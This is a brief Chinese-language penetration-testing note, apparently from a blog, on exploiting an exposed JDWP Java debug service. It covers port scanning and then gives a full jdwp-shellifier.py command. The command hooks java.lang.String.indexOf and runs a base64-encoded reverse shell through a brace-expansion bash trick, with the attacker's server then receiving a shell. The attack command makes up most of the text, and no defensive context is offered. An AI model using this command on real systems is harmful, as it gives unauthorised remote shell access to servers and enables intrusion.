扫端口探测

取巧,直接根据之前的报告探测jdwp服务

利用

1
python2 jdwp-shellifier.py -t ip -p port --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,base64编码的反弹shell命令}|{base64,-d}|{bash,-i}"


然后服务器上接收到shell